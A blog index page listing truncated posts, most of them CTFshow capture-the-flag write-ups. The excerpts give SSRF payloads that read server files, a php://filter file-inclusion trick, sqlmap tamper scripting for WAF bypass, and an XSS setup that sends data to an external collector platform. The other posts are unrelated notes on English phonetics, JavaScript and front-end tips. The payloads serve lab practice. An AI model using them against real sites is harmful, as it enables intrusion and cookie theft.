【原创】编写sqlmap–tamper脚本
[huayang] sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload,由此可以使用tamper来绕过waf,替换被过滤的关键字等 我们先来分析一下我的原创脚本web209 #!/usr/bin/env python """ Author: huayang """ from lib.core.compat import xrange from lib.core.…
【原创】CTFshow—黑盒测试
[huayang] 简单来说就是用前面所学过的知识测试当前网站 web380 暴躁羽师傅 提示id参数打开失败 我们随便定义一个 通过伪协议读取一下page 进行base64编码再试试 page.php?id=php://filter/convert.base64-encode/resource=page 文件包含 view-source:http://d491207b-62d2-47f5-a91…
【原创】CTFshow—SSRF
[huayang] web351 尝试读一下日志文件 url=file:///var/log/nginx/access.log url=file:///var/www/html/flag.php 方法二 url=http://127.0.0.1/flag.php web352 web352 url=http:/0x7f.0.0.1/flag.php web354 url=http://sudo.c…
【原创 精华】英语音标及发音
一个一个的查累死爷了 [i:] e ea ee ie ei i ey e: evening [ˈiːvnɪŋ] 傍晚 ee: sweet [swiːt] 甜的 ea: meat [miːt] 肉 ie: piece [piːs] 块 ei: receive [rɪˈsiːv] 接收 i: police [pəˈliːs] 警方 ey: key …
【原创】CTFshow—XSS
[huayang] 首先要在这个平台注册一个账号:https://xss.pt/ 看到我的项目,点击创建项目 随便写然后下一步 最后查看代码就可以进行攻击啦 web316 标准代码即可 web317—319 web320—322 新增了空格过滤用tap绕过即可 注意tap在记事本里打在vscode上不行 web323-326 <body/onload=document.location='i…
thumbnail
【学习笔记】JavaScript
[huayang] 基本语法 JavaScript的语法和Java语言类似,每个语句以;结束 注释 单行注释 // 多行注释 /**/ 数据类型 JavaScript不区分整数和浮点数,统一用Number表示 布尔值 &&运算是与运算,只有所有都为true,&&运算结果才是true ||运算是或运算,只要其中有一个为true,||运算结果就是true !运算是非运算…
【原创】前端小技巧
[huayang] 屏幕自适应 <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no"> 设置全屏背景并且图片固定不动 body{ background-image: url(https://hell…